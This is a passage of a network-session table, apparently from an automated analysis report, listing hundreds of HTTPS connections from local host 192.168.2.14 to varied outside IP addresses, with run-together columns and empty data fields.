                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20092192.168.2.14498928.64.88.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20093192.168.2.1451874122.254.173.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20094192.168.2.1441440176.170.93.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20095192.168.2.1433240195.225.108.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20096192.168.2.1448428186.194.78.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20097192.168.2.145474682.61.204.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20098192.168.2.1445734132.61.119.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20099192.168.2.1437934123.16.79.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20100192.168.2.1452626145.205.101.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20101192.168.2.143292232.157.4.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20102192.168.2.143368093.133.126.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20103192.168.2.1445250132.228.45.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20104192.168.2.1436392159.117.229.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20105192.168.2.144687097.33.90.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20106192.168.2.143544619.19.209.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20107192.168.2.1444948179.249.171.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20108192.168.2.144923649.229.213.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20109192.168.2.1437766122.81.136.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20110192.168.2.1460448204.17.34.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20111192.168.2.1457472217.184.94.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20112192.168.2.1436618118.49.237.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20113192.168.2.1449596171.250.103.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20114192.168.2.1448942166.174.129.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20115192.168.2.145730224.7.8.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20116192.168.2.1438656150.107.161.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20117192.168.2.144539647.85.173.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20118192.168.2.1435232207.203.40.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20119192.168.2.145026439.147.230.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20120192.168.2.144726276.236.3.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20121192.168.2.1455268159.113.174.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20122192.168.2.1434208153.215.173.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20123192.168.2.1437856172.73.176.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20124192.168.2.145232063.70.203.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20125192.168.2.143723298.83.80.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20126192.168.2.1435494172.55.216.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20127192.168.2.143585431.24.2.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20128192.168.2.144221049.157.35.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20129192.168.2.143473287.107.139.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20130192.168.2.1445440110.123.244.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20131192.168.2.144512063.202.87.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20132192.168.2.145148250.8.226.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20133192.168.2.1434560171.9.115.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20134192.168.2.145900869.229.56.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20135192.168.2.1445896218.184.157.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20136192.168.2.1454786103.70.52.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20137192.168.2.143352827.6.161.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20138192.168.2.1437918104.234.247.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20139192.168.2.144844423.231.33.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20140192.168.2.14369342.231.114.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20141192.168.2.1460574196.196.238.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20142192.168.2.1455346222.125.119.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20143192.168.2.1452770154.216.18.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20144192.168.2.1455484176.236.9.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20145192.168.2.145477818.183.18.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20146192.168.2.1446716189.37.181.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20147192.168.2.1448224166.18.241.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20148192.168.2.1439800116.73.86.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20149192.168.2.1442766210.129.212.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20150192.168.2.1443756179.76.144.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20151192.168.2.1447432177.252.220.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20152192.168.2.143540668.164.2.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20153192.168.2.1445348116.112.221.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20154192.168.2.1455162195.9.19.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20155192.168.2.1439958213.189.244.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20156192.168.2.1457888151.139.176.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20157192.168.2.1452798115.5.102.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20158192.168.2.1433516118.169.119.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20159192.168.2.1439686195.148.171.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20160192.168.2.1455312201.107.243.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20161192.168.2.1454908204.208.210.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20162192.168.2.1432846109.18.161.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20163192.168.2.1442338179.146.83.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20164192.168.2.1456360170.141.75.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20165192.168.2.1434242140.242.175.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20166192.168.2.144184458.153.167.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20167192.168.2.143652062.157.217.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20168192.168.2.1456792206.48.112.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20169192.168.2.1459974206.164.150.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20170192.168.2.1435014138.14.91.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20171192.168.2.144414024.137.181.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20172192.168.2.1453088134.230.249.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20173192.168.2.1438486185.255.189.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20174192.168.2.1447120204.207.15.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20175192.168.2.143548238.240.77.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20176192.168.2.143819037.169.9.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20177192.168.2.14514168.126.83.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20178192.168.2.143700412.223.70.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20179192.168.2.1434416137.182.104.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20180192.168.2.1452400178.248.9.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20181192.168.2.145678854.172.39.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20182192.168.2.1440030130.142.206.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20183192.168.2.1437610140.67.19.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20184192.168.2.143433479.203.176.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20185192.168.2.1442144134.25.171.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20186192.168.2.1450572101.172.36.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20187192.168.2.1448126191.132.146.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20188192.168.2.143626627.192.223.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20189192.168.2.143423066.249.2.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20190192.168.2.1455212117.173.191.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20191192.168.2.1454858205.209.74.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20192192.168.2.143913818.192.57.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20193192.168.2.1456160129.83.96.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20194192.168.2.14537765.36.213.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20195192.168.2.1435584173.139.65.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20196192.168.2.1442422126.143.245.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20197192.168.2.1445174167.222.66.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20198192.168.2.1446612195.180.29.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20199192.168.2.144619680.181.55.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20200192.168.2.1448396159.68.11.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20201192.168.2.1439274203.245.96.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20202192.168.2.144525896.106.212.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20203192.168.2.144935027.1.28.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20204192.168.2.1434626109.134.245.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20205192.168.2.144435442.122.207.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20206192.168.2.1458608124.53.219.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20207192.168.2.145701869.63.157.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20208192.168.2.1434556107.151.44.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20209192.168.2.1434248149.230.149.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20210192.168.2.144627047.188.109.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20211192.168.2.145073054.54.9.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20212192.168.2.1439848111.253.250.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20213192.168.2.14582721.101.178.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20214192.168.2.1445100211.44.143.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20215192.168.2.144704252.58.88.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20216192.168.2.1448324137.244.17.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20217192.168.2.143580227.94.120.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20218192.168.2.1449418183.60.130.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20219192.168.2.1437304100.59.207.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20220192.168.2.1444124211.113.71.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20221192.168.2.1459846157.140.232.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20222192.168.2.1457510120.239.25.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20223192.168.2.1444872170.99.64.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20224192.168.2.144192259.95.126.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20225192.168.2.145354865.67.42.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20226192.168.2.1448074172.90.56.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20227192.168.2.1448944213.148.32.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20228192.168.2.143356023.232.91.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20229192.168.2.1434800198.146.214.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20230192.168.2.1455902219.178.29.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20231192.168.2.1445052161.38.246.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20232192.168.2.1435596111.17.198.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20233192.168.2.1441474109.44.160.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20234192.168.2.1455320136.42.142.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20235192.168.2.1435884157.220.89.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20236192.168.2.145379423.99.169.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20237192.168.2.1437036164.222.187.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20238192.168.2.144683264.212.199.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20239192.168.2.1453566117.65.42.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20240192.168.2.144888878.125.67.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20241192.168.2.1453832190.5.7.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20242192.168.2.1444308185.102.65.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20243192.168.2.1454134139.105.252.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20244192.168.2.1445250152.168.110.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20245192.168.2.145519664.111.131.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20246192.168.2.1441094185.224.81.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20247192.168.2.1459738145.86.75.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20248192.168.2.1437508108.128.114.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20249192.168.2.14515282.158.104.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20250192.168.2.14451222.82.229.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20251192.168.2.1439730213.30.1.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20252192.168.2.1438446163.89.147.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20253192.168.2.1446130115.65.234.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20254192.168.2.1460220188.116.249.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20255192.168.2.1447556202.97.96.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20256192.168.2.1442734178.164.199.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20257192.168.2.1434220222.122.254.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20258192.168.2.1445758221.1.188.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20259192.168.2.1459618166.102.179.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20260192.168.2.1435294132.124.194.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20261192.168.2.1441410126.41.61.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20262192.168.2.1445334109.134.106.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20263192.168.2.145225025.135.23.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20264192.168.2.1457716137.71.224.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20265192.168.2.1457652196.88.220.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20266192.168.2.1434454186.110.238.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20267192.168.2.144486084.77.89.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20268192.168.2.145359099.22.0.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20269192.168.2.144257880.140.222.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20270192.168.2.1450838197.89.200.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20271192.168.2.1460718115.61.8.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20272192.168.2.1443162205.17.177.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20273192.168.2.145721477.238.144.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20274192.168.2.1439616139.134.218.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20275192.168.2.145635868.96.150.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20276192.168.2.145853820.13.233.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20277192.168.2.1434448141.176.174.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20278192.168.2.1435922125.213.45.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20279192.168.2.1439132117.155.66.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20280192.168.2.143369812.24.195.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20281192.168.2.144955242.65.185.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20282192.168.2.1439960192.249.113.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20283192.168.2.143550637.48.187.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20284192.168.2.144505489.91.90.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20285192.168.2.14398205.27.122.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20286192.168.2.1458106167.157.218.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20287192.168.2.144848453.217.214.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20288192.168.2.1439734130.62.115.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20289192.168.2.1459930164.151.127.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20290192.168.2.144241020.251.147.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20291192.168.2.1457014160.103.25.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20292192.168.2.145772069.122.207.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20293192.168.2.144546442.82.158.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20294192.168.2.1444788152.23.190.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20295192.168.2.1444252100.198.25.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20296192.168.2.143287479.199.183.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20297192.168.2.1442082115.133.23.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20298192.168.2.1450612144.201.245.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20299192.168.2.1438872161.38.0.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20300192.168.2.1452452203.21.135.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20301192.168.2.1457286146.127.143.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20302192.168.2.1445890179.238.68.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20303192.168.2.144189639.42.237.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20304192.168.2.144465049.187.196.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20305192.168.2.143488688.106.117.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20306192.168.2.144018023.133.56.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20307192.168.2.145346492.122.47.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20308192.168.2.14529928.230.11.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20309192.168.2.144018452.237.184.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20310192.168.2.145932651.51.7.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20311192.168.2.1451954180.162.117.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20312192.168.2.1448006171.39.21.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
